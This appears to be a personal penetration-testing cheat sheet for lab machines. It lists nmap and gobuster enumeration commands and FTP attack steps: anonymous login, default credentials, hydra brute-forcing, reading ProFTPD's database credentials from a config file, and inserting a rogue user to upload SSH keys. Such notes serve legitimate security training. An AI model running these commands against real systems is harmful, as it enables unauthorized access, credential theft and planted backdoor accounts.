Top commands 🥇

Nmap

sudo nmap -sSCV --min-rate 5000 -Pn -n -p- --open -vvv -oA all_ports <target>

Gobuster

# Directories
gobuster dir -e -t 100 -b 400-600 --exclude-length 0 --no-error -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -w /usr/share/wordlists/own/final_directories.txt -u <target>

# Filenames
gobuster dir -e -t 100 -b 400-600 --exclude-length 0 --no-error -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -w /usr/share/own/dirb/common_4459.txt -x .asp,.aspx,.config,.do,.git,.html,.jsp,.pdf,.php,.ps1,.sql,.txt,.yml -u <target>

# Virtual hosts
gobuster vhost -t 100 -w /usr/share/own/subdomain/knocpy_1921.txt --append-domain -u <target> # Do not prefix the target with http://

Pentesting Services 🪲

21 FTP

# Default ports are 20 (data) and 21 (control).
# Always try the default credentials `admin:admin` and `user:system`.
# If FTP is not working or is slow, run `passive off` after a successful login.
# Switch to `binary` mode before uploading a binary file such as shell.exe, or it will be corrupted.

# Check whether anonymous login is allowed
ftp -n <target> <<END
user anonymous anonymous
<command>
quit
END
# Example commands: ls
# put <local_file> <remote_file>

# Download
get <file>

# Upload
mput <local_file> <remote_file>

# Use secure FTP
ftp-ssl -z secure -z verify=0 -z cipher="$(openssl ciphers -tls1)" -p <target>

# ProFTP credentials
cat /etc/proftpd/sql.conf # SQLConnectInfo proftpd@localhost proftpd protfpd_with_MYSQL_password
# Add user (first connect to the MySQL backend and inspect the existing `ftpuser` rows)
mysql -u proftpd -p'protfpd_with_MYSQL_password' -h 127.0.0.1 -P 3306
show databases;
use proftpd;
select * from ftpuser;

# Create a proftpd user (hash the password first, then insert the row)

/bin/echo "{md5}"`/bin/echo -n '23Qwerty!' | openssl dgst -binary -md5 | openssl enc -base64` # {md5}RPesAkyTyJaqB6afVNB2pA==

INSERT INTO `ftpuser` (`id`, `userid`, `passwd`, `uid`, `gid`, `homedir`, `shell`, `count`, `accessed`, `modified`) VALUES (NULL, 'benoit', '{md5}RPesAkyTyJaqB6afVNB2pA==', '1000', '1000', '/', '/bin/bash', '0', '2022-12-05 05:26:29', '2022-12-12 05:26:29');

# Connect to FTP and upload authorized_keys
# https://medium.com/@nico26deo/how-to-set-up-proftpd-with-a-mysql-backend-on-ubuntu-c6f23a638caf

# Nmap FTP NSE
nmap --script ftp-anon -p 21 <target>
nmap --script ftp-vuln* -p 21 <target>
nmap --script ftp-* -p 21 <target>

# FTP Bruteforce
hydra -I -V -f -u -e nsr -L usernames.txt -P usernames.txt <target> ftp -s 21 # or use ftp://<machine_ip>

# Default credentials
paste -d ":" usernames.txt passwords.txt > ftp_credentials.txt

hydra -I -V -f -u -e s -t 1 -C /usr/share/wordlists/own/services/ftp/ftp_credentials.txt exghost.offsec ftp -s 21 # Try machine_name:machine_name